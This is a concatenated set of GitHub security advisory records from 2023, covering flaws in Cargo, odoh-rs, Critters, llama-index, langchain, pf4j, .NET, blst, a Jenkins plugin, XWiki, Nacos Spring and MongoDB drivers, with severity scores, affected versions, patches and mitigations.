The Rust Security Response WG was notified that Cargo did not respect the umask when extracting crate archives on UNIX-like systems. If the user downloaded a crate containing files writeable by any local user, another local user could exploit this to change the source code compiled and executed by the current user. This vulnerability has been assigned CVE-2023-38497. ## Overview In UNIX-like systems, each file has three sets of permissions: for the user owning the file, for the group owning the file, and for all other local users. The "[umask][1]" is configured on most systems to limit those permissions during file creation, removing dangerous ones. For example, the default umask on macOS and most Linux distributions only allow the user owning a file to write to it, preventing the group owning it or other local users from doing the same. When a dependency is downloaded by Cargo, its source code has to be extracted on disk to allow the Rust compiler to read as part of the build. To improve performance, this extraction only happens the first time a dependency is used, caching the pre-extracted files for future invocations. Unfortunately, it was discovered that Cargo did not respect the umask during extraction, and propagated the permissions stored in the crate archive as-is. If an archive contained files writeable by any user on the system (and the system configuration didn't prevent writes through other security measures), another local user on the system could replace or tweak the source code of a dependency, potentially achieving code execution the next time the project is compiled. ## Affected Versions All Rust versions before 1.71.1 on UNIX-like systems (like macOS and Linux) are affected. Note that additional system-dependent security measures configured on the local system might prevent the vulnerability from being exploited. Users on Windows and other non-UNIX-like systems are not affected. ## Mitigations We recommend all users to update to Rust 1.71.1, which will be released later today, as it fixes the vulnerability by respecting the umask when extracting crate archives. If you build your own toolchain, patches for 1.71.0 source tarballs are [available here][2]. To prevent existing cached extractions from being exploitable, the Cargo binary included in Rust 1.71.1 or later will purge the caches it tries to access if they were generated by older Cargo versions. If you cannot update to Rust 1.71.1, we recommend configuring your system to prevent other local users from accessing the Cargo directory, usually located in `~/.cargo`: ``` chmod go= ~/.cargo ``` ## Acknowledgments We want to thank Addison Crump for responsibly disclosing this to us according to the [Rust security policy][3]. We also want to thank the members of the Rust project who helped us disclose the vulnerability: Weihang Lo for developing the fix; Eric Huss for reviewing the fix; Pietro Albini for writing this advisory; Pietro Albini, Manish Goregaokar and Josh Stone for coordinating this disclosure; Josh Triplett, Arlo Siemen, Scott Schafer, and Jacob Finkelman for advising during the disclosure. [1]: https://en.wikipedia.org/wiki/Umask [2]: https://github.com/rust-lang/wg-security-response/tree/main/patches/CVE-2023-38497 [3]: https://www.rust-lang.org/policies/security
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N'}]
[{'package': {'ecosystem': 'crates.io', 'name': 'cargo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.72.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.72.1'}}]
[{'type': 'WEB', 'url': 'https://github.com/rust-lang/cargo/security/advisories/GHSA-j3xp-wfr4-hx87'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38497'}, {'type': 'WEB', 'url': 'https://github.com/rust-lang/cargo/pull/12443'}, {'type': 'WEB', 'url': 'https://github.com/rust-lang/cargo/commit/d78bbf4bde3c6b95caca7512f537c6f9721426ff'}, {'type': 'WEB', 'url': 'https://en.wikipedia.org/wiki/Umask'}, {'type': 'PACKAGE', 'url': 'https://github.com/rust-lang/cargo'}, {'type': 'WEB', 'url': 'https://github.com/rust-lang/wg-security-response/tree/main/patches/CVE-2023-38497'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QGKE6PGM4HIQUHPJRBQAHMELINSGN4H4/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QMEXGUGPW5OBSQA6URTBNDSU3RAEFOZ4/'}, {'type': 'WEB', 'url': 'https://www.rust-lang.org/policies/security'}]
{'cwe_ids': ['CWE-278', 'CWE-732'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-03T16:30:52Z', 'nvd_published_at': None}
1.4.0
GHSA-gpcv-p28p-fv2p
2023-08-03T16:35:20Z
2023-08-03T16:35:20Z
null
['CVE-2023-3766']
odoh-rs's Invalid Slice Split Results in Server Panic
A vulnerability was discovered in the odoh-rs rust crate that stems from faulty logic during the parsing of encrypted queries. This issue specifically occurs when processing encrypted query data received from remote clients. ### Impact An attacker with knowledge of this vulnerability could craft and send specially designed encrypted queries to targeted ODOH servers running with odoh-rs. Upon successful exploitation, the server will crash abruptly, disrupting its normal operation and rendering the service temporarily unavailable. ### Patches Users are encouraged to update their odoh-rs's rust crate to v1.0.2.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'crates.io', 'name': 'odoh-rs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.2'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/cloudflare/odoh-rs/security/advisories/GHSA-gpcv-p28p-fv2p'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3766'}, {'type': 'WEB', 'url': 'https://github.com/cloudflare/odoh-rs/pull/28'}, {'type': 'WEB', 'url': 'https://github.com/cloudflare/odoh-rs/commit/c1bc4ed71dcc9842b7dc1ea26f278f105074bbaa'}, {'type': 'PACKAGE', 'url': 'https://github.com/cloudflare/odoh-rs'}]
{'cwe_ids': ['CWE-120'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-03T16:35:20Z', 'nvd_published_at': None}
1.4.0
GHSA-cx3j-qqxj-9597
2023-08-25T18:55:56Z
2023-08-11T18:57:53Z
null
['CVE-2023-3481']
Critters Cross-site Scripting Vulnerability
### Impact Critters version 0.0.17-0.0.19 have an issue when parsing the HTML which leads to a potential [cross-site scripting (XSS)](https://owasp.org/www-community/attacks/xss/) bug. ### Patches The bug has been fixed in `v0.0.20`. ### Workarounds Upgrading Critters version to `>0.0.20` is the easiest fix. This is a non breaking version upgrade so we recommend all users to use `v0.0.20`.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'npm', 'name': 'critters'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.0.17'}, {'fixed': '0.0.20'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.0.19'}}]
[{'type': 'WEB', 'url': 'https://github.com/GoogleChromeLabs/critters/security/advisories/GHSA-cx3j-qqxj-9597'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3481'}, {'type': 'WEB', 'url': 'https://github.com/GoogleChromeLabs/critters/pull/133'}, {'type': 'WEB', 'url': 'https://github.com/GoogleChromeLabs/critters/commit/7757902c9e0b3285d516359b3cb602cd9d50d80e'}, {'type': 'PACKAGE', 'url': 'https://github.com/GoogleChromeLabs/critters'}]
{'cwe_ids': ['CWE-116', 'CWE-79', 'CWE-80'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-11T18:57:53Z', 'nvd_published_at': None}
1.4.0
GHSA-2xxc-73fv-36f7
2023-08-22T18:38:15Z
2023-08-15T18:31:32Z
null
['CVE-2023-39662']
llama-index vulnerable to arbitrary code execution
An issue in llama_index v.0.7.13 and before allows a remote attacker to execute arbitrary code via the `exec` parameter in PandasQueryEngine function.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'llama-index'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.7.13'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39662'}, {'type': 'WEB', 'url': 'https://github.com/jerryjliu/llama_index/issues/7054'}, {'type': 'PACKAGE', 'url': 'https://github.com/jerryjliu/llama_index'}]
{'cwe_ids': ['CWE-74', 'CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-08-15T21:23:47Z', 'nvd_published_at': None}
1.4.0
GHSA-3r28-rgp9-qgv4
2023-08-31T14:59:24Z
2023-08-29T00:32:04Z
null
['CVE-2023-40826']
pf4j vulnerable to remote code execution via the zippluginPath parameter
An issue in pf4j pf4j v.3.9.0 and before allows a remote attacker to obtain sensitive information and execute arbitrary code via the zippluginPath parameter.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.pf4j:pf4j'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.9.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40826'}, {'type': 'WEB', 'url': 'https://github.com/pf4j/pf4j/issues/536'}, {'type': 'PACKAGE', 'url': 'https://github.com/pf4j/pf4j'}]
{'cwe_ids': ['CWE-22', 'CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-29T17:41:26Z', 'nvd_published_at': None}
1.4.0
GHSA-p57v-gv7q-4xfm
2023-08-09T13:04:54Z
2023-08-09T13:04:54Z
null
['CVE-2023-38178']
.NET Denial of Service Vulnerability
# Microsoft Security Advisory CVE-2023-38178: .NET Denial of Service Vulnerability ## <a name="executive-summary"></a>Executive summary Microsoft is releasing this security advisory to provide information about a vulnerability in .NET 7.0. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability. A vulnerability exists in .NET Kestrel where a malicious client can bypass QUIC stream limit in HTTP/3 in both ASP.NET and .NET runtimes resulting in denial of service. ## Announcement Announcement for this issue can be found at https://github.com/dotnet/announcements/issues/268 ### <a name="mitigation-factors"></a>Mitigation factors Microsoft has not identified any mitigating factors for this vulnerability. ## <a name="affected-software"></a>Affected software * Any .NET 7.0 application running on .NET 7.0.9 or earlier. If your application uses the following package versions, ensure you update to the latest version of .NET. ### <a name=".NET 7"></a>.NET 7 Package name | Affected version | Patched version ------------ | ---------------- | ------------------------- [Microsoft.AspNetCore.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm64) | >= 7.0.0, <= 7.0.9 | 7.0.10 [Microsoft.AspNetCore.App.Runtime.win-arm](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-arm64) | >= 7.0.0, <= 7.0.9 | 7.0.10 [Microsoft.AspNetCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x64) | >= 7.0.0, <= 7.0.9 | 7.0.10 [Microsoft.AspNetCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.AspNetCore.App.Runtime.win-x86) | >= 7.0.0, <= 7.0.9 | 7.0.10 [Microsoft.NetCore.App.Runtime.win-arm](https://www.nuget.org/packages/ Microsoft.NetCore.App.Runtime.win-arm) | >= 7.0.0, <= 7.0.9 | 7.0.10 [Microsoft.NetCore.App.Runtime.win-arm](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-arm64) | >= 7.0.0, <= 7.0.9 | 7.0.10 [Microsoft.NetCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-x86) | >= 7.0.0, <= 7.0.9 | 7.0.10 [Microsoft.NetCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-x64) | >= 7.0.0, <= 7.0.9 | 7.0.10 ### <a name=".NET 6"></a>.NET 6 .NET 6 included HTTP/3 support as a [preview feature](https://learn.microsoft.com/dotnet/core/extensions/httpclient-http3#http3-support-in-net-6) , which requires specific opt-in code. If you are using HTTP/3 in .NET 6 you must update your application to .NET 7, where the feature is supported, to fix the vulnerability. Future versions of .NET will disable the preview feature entirely. ## Advisory FAQ ### <a name="how-affected"></a>How do I know if I am affected? If you have a runtime or SDK with a version listed, or an affected package listed in [affected software](#affected-software), you're exposed to the vulnerability. ### <a name="how-fix"></a>How do I fix the issue? * To fix the issue please install the latest version of .NET 7.0. If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs. * To fix this issue on Linux, please update `libmsquic` to 2.2+ * If you are using one of the affected packages, please update to the patched version listed above. * If you have .NET 6.0 or greater installed, you can list the versions you have installed by running the `dotnet --info` command. You will see output like the following; ``` .NET Core SDK (reflecting any global.json): Version: 7.0.400 Commit: 8473146e7d Runtime Environment: OS Name: Windows OS Version: 10.0.18363 OS Platform: Windows RID: win10-x64 Base Path: C:\Program Files\dotnet\sdk\6.0.300\ Host (useful for support): Version: 7.0.10 Commit: 8473146e7d .NET Core SDKs installed: 7.0.400 [C:\Program Files\dotnet\sdk] .NET Core runtimes installed: Microsoft.AspNetCore.App 7.0.10 [C:\Program Files\dotnet\shared\Microsoft.AspNetCore.App] Microsoft.NETCore.App 7.0.10 [C:\Program Files\dotnet\shared\Microsoft.NETCore.App] Microsoft.WindowsDesktop.App 7.0.10 [C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App] To install additional .NET Core runtimes or SDKs: https://aka.ms/dotnet-download ``` * If you're using .NET 7.0, you should download and install Runtime 7.0.10 or SDK 7.0.700 (for Visual Studio 2022 v17.7) from https://dotnet.microsoft.com/download/dotnet-core/6.0. .NET 7.0 updates are also available from Microsoft Update. To access this either type "Check for updates" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates. Once you have installed the updated runtime or SDK, restart your apps for the update to take effect. Additionally, if you've deployed [self-contained applications](https://docs.microsoft.com/dotnet/core/deploying/#self-contained-deployments-scd) targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed. ## Other Information ### Reporting Security Issues If you have found a potential security issue in .NET 6.0 or .NET 7.0, please email details to secure@microsoft.com. Reports may qualify for the Microsoft .NET Core & .NET 5 Bounty. Details of the Microsoft .NET Bounty Program including terms and conditions are at <https://aka.ms/corebounty>. ### Support You can ask questions about this issue on GitHub in the .NET GitHub organization. The main repos are located at https://github.com/dotnet/runtime and https://github.com/dotnet/aspnet/. The Announcements repo (https://github.com/dotnet/Announcements) will contain this bulletin as an issue and will include a link to a discussion issue. You can ask questions in the linked discussion issue. ### Disclaimer The information provided in this advisory is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. ### External Links [CVE-2023-38178]( https://www.cve.org/CVERecord?id=CVE-2023-38178) ### Revisions V1.0 (August 08, 2023): Advisory published. _Version 1.0_ _Last Updated 2023-08-08_
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.App.Runtime.win-arm64'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.10'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.9'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.App.Runtime.win-arm'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.10'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.9'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.App.Runtime.win-x64'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.10'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.9'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.AspNetCore.App.Runtime.win-x86'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.10'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.9'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-arm'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.10'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.9'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-arm64'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.10'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.9'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-x64'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.10'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.9'}}, {'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.NetCore.App.Runtime.win-x86'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.10'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.0.9'}}]
[{'type': 'WEB', 'url': 'https://github.com/dotnet/runtime/security/advisories/GHSA-p57v-gv7q-4xfm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-38178'}, {'type': 'PACKAGE', 'url': 'https://github.com/dotnet/runtime'}, {'type': 'WEB', 'url': 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-38178'}]
{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-09T13:04:54Z', 'nvd_published_at': None}
1.4.0
GHSA-8c37-7qx3-4c4p
2023-09-21T14:13:41Z
2023-08-09T20:57:57Z
null
[]
Blst has logical error in SigValidate in Go bindings
### Impact Blst versions v0.3.0 through 0.3.10 failed to perform a signature group-check if the call to `SigValidate` in the Go bindings was complemented with a check for infinity. Formally speaking, infinity, or the identity element of the elliptic curve group, is a member of the group, and the group-check should allow it. An initial review of blst users on GitHub did not uncover any use of this function with the complementary infinity check. This optional check was added as a convenience feature because despite infinity being a legitimate member of the group, individual signatures should never be infinite (as it is equivalent to having zero for the secret key), and observing one should raise a flag. ### Description The vulnerable function is declared as `SigValidate(sigInfcheck bool) bool` and if called with `sigInfcheck` argument set to `true`, the group-check was omitted. The group-check is required to be performed on untrusted input, because the pairing, the corner-stone operation of the signature scheme, is defined only on points that are members of a specific cyclic group, which is a subset of all the possible points on elliptic curves in question. Submitting an untrusted point outside the group opens up the possibility of accepting an alternative signature for a chosen message. It should be noted that the SigValidate call is not the only way to perform the group-checks. There are optional checks integrated into various other verification methods, such as `Verify`, `AggregateVerify`, etc., as well as signature aggregation methods, such as `PairingAggregate*`. The reason why there are multiple options is that the group-check is a relatively expensive operation, and application developers are arguably entitled the freedom to choose when it's performed. ### Patches This issue has been resolved in the v0.3.11 release and users are advised to update if their application is affected or alternatively omit the complementary infinity check. ### Credits A special thanks to Yunjong Jeong (@blukat29) for the discovery and disclosure of this vulnerability.
[]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/supranational/blst'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.3.0'}, {'fixed': '0.3.11'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/supranational/blst/security/advisories/GHSA-8c37-7qx3-4c4p'}, {'type': 'WEB', 'url': 'https://github.com/supranational/blst/commit/fb91221c91c82f65bfc7f243256308977a06d48b'}, {'type': 'PACKAGE', 'url': 'https://github.com/supranational/blst'}, {'type': 'WEB', 'url': 'https://github.com/supranational/blst/releases/tag/v0.3.11'}]
{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-09T20:57:57Z', 'nvd_published_at': None}
1.4.0
GHSA-qxwc-wchr-5h29
2023-08-16T21:06:56Z
2023-08-16T15:30:18Z
null
['CVE-2023-40348']
Jenkins Gogs Plugin vulnerable to unsafe default behavior and information disclosure
Jenkins Gogs Plugin provides a webhook endpoint at `/gogs-webhook` that can be used to trigger builds of jobs. In Gogs Plugin 1.0.15 and earlier, an option to specify a Gogs secret for this webhook is provided, but not enabled by default. This allows unauthenticated attackers to trigger builds of jobs corresponding to the attacker-specified job name. Additionally, the output of the webhook endpoint includes whether a job corresponding to the attacker-specified job name exists, even if the attacker has no permission to access it. As of publication of this advisory, there is no fix.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:gogs-webhook'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.15'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40348'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-08-16/#SECURITY-2894'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/08/16/3'}]
{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-16T21:06:56Z', 'nvd_published_at': None}
1.4.0
GHSA-h8cm-3v5f-rgp6
2023-08-29T22:44:58Z
2023-08-21T19:59:12Z
null
['CVE-2023-40176']
XWiki Platform Stored Cross-site Scripting in the user profile via the timezone displayer
### Impact Any registered user can exploit a stored XSS through their user profile by setting the payload as the value of the time zone user preference. Even though the time zone is selected from a drop down (no free text value) it can still be set from JavaScript (using the browser developer tools) or by calling the save URL on the user profile with the right query string. Once the time zone is set it is displayed without escaping which means the payload gets executed for any user that visits the malicious user profile, allowing the attacker to steal information and even gain more access rights (escalation to programming rights). The problem is present [since version 4.1M2](https://jira.xwiki.org/browse/XWIKI-7847) when the time zone user preference was introduced. ### Patches The issue has been fixed in XWiki 14.10.5 and 15.1RC1 by https://github.com/xwiki/xwiki-platform/commit/d11ca5d781f8a42a85bc98eb82306c1431e764d4 . The main fix is in the [``displayer_timezone.vm``](https://github.com/xwiki/xwiki-platform/commit/d11ca5d781f8a42a85bc98eb82306c1431e764d4#diff-57ffb6e10fa8768e59948f2becf755699570d97b78bb12a9623e0de49e6c5c7d) precisely at this [line](https://github.com/xwiki/xwiki-platform/commit/d11ca5d781f8a42a85bc98eb82306c1431e764d4#diff-57ffb6e10fa8768e59948f2becf755699570d97b78bb12a9623e0de49e6c5c7dR40): $!escapetool.xml($value) By escaping the displayed time zone value we make sure the attacker's payload is not executed. ### Workarounds If you want to fix this problem on older versions of XWiki that have not been patched then you need to edit ``displayer_timezone.vm`` and escape the displayed time zone value [here](https://github.com/xwiki/xwiki-platform/blob/xwiki-platform-14.10.4/xwiki-platform-core/xwiki-platform-web/xwiki-platform-web-templates/src/main/resources/templates/displayer_timezone.vm#L32): ``` - $!value + $!escapetool.xml($value) ``` ### References * JIRA issue https://jira.xwiki.org/browse/XWIKI-20276 * Fix https://github.com/xwiki/xwiki-platform/commit/d11ca5d781f8a42a85bc98eb82306c1431e764d4 ### For more information If you have any questions or comments about this advisory: * Open an issue in [Jira XWiki.org](https://jira.xwiki.org/) * Email us at [Security Mailing List](mailto:security@xwiki.org) ### Attribution This vulnerability has been found and reported by @michitux .
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-web-templates'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.1-milestone-2'}, {'fixed': '14.10.5'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-h8cm-3v5f-rgp6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-40176'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/d11ca5d781f8a42a85bc98eb82306c1431e764d4'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-7847'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-08-21T19:59:12Z', 'nvd_published_at': None}
1.4.0
GHSA-7gfq-f96f-g85j
2023-08-31T14:25:01Z
2023-08-22T21:30:27Z
null
['CVE-2023-36281']
langchain vulnerable to arbitrary code execution
An issue in langchain v.0.0.171 allows a remote attacker to execute arbitrary code via the via the a json file to the load_prompt parameter.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'langchain'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.0.171'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-36281'}, {'type': 'WEB', 'url': 'https://github.com/hwchase17/langchain/issues/4394'}, {'type': 'WEB', 'url': 'https://aisec.today/LangChain-2e6244a313dd46139c5ef28cbcab9e55'}, {'type': 'PACKAGE', 'url': 'https://github.com/langchain-ai/langchain'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/langchain/PYSEC-2023-151.yaml'}]
{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-08-23T13:22:25Z', 'nvd_published_at': None}
1.4.0
GHSA-v6c8-pwhq-288m
2023-09-01T17:33:29Z
2023-08-21T18:31:23Z
null
['CVE-2023-39106']
Nacos Spring vulnerable to Unsafe Deserialization
An issue in Nacos Group Nacos Spring Project v.1.1.1 and before allows a remote attacker to execute arbitrary code via the SnakeYamls Constructor() component.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'com.alibaba.nacos:nacos-spring-context'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.1.1'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-39106'}, {'type': 'WEB', 'url': 'https://github.com/nacos-group/nacos-spring-project/issues/314'}, {'type': 'PACKAGE', 'url': 'https://github.com/nacos-group/nacos-spring-project'}]
{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-08-21T20:45:33Z', 'nvd_published_at': None}
1.4.0
GHSA-vxvm-qww3-2fh7
2023-08-30T21:20:44Z
2023-08-29T18:31:53Z
null
['CVE-2021-32050']
MongoDB Driver may publish events containing authentication-related data
Some MongoDB Drivers may erroneously publish events containing authentication-related data to a command listener configured by an application. The published events may contain security-sensitive data when specific authentication-related commands are executed. Without due care, an application may inadvertently expose this sensitive information, e.g., by writing it to a log file. This issue only arises if an application enables the command listener feature (this is not enabled by default). This issue affects the MongoDB C Driver 1.0.0 prior to 1.17.7, MongoDB PHP Driver 1.0.0 prior to 1.9.2, MongoDB Swift Driver 1.0.0 prior to 1.1.1, MongoDB Node.js Driver 3.6 prior to 3.6.10, MongoDB Node.js Driver 4.0 prior to 4.17.0 and MongoDB Node.js Driver 5.0 prior to 5.8.0. This issue also affects users of the MongoDB C++ Driver dependent on the C driver 1.0.0 prior to 1.17.7 (C++ driver prior to 3.7.0).
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N'}]
